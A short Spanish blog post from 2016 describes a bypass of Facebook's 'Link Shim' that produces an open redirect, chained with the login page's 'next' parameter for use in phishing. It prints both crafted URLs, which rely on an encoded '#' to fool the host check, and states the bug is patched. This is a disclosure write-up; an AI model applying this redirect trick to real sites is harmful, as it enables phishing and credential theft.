domingo, 18 de diciembre de 2016

Login Open Redirect - Facebook

Hola a todos después de mucho tiempo :D

Seré breve. Se trata de un bypass en el famoso "Link Shim" de Facebook que permite un Open Redirect. Tan sencillo como esto:

http://www.facebook.com/l.php?u=http://example.com%23.youtube.com/&h=xxxxxxxxx

Luego solo hay que enlazar este link con el parámetro "next" en el login de Facebook para tener un bonito Login Open Redirect explotable en un ataque de phishing }:))

https://www.facebook.com/login?next=%2fl.php%3Fu%3Dhttp%3A%2f%2fexample.com%2523.youtube.com%26h%3Dxxxxxxxxx

A la fecha este fallo ya está parchado  0:)

Demo


Un saludo.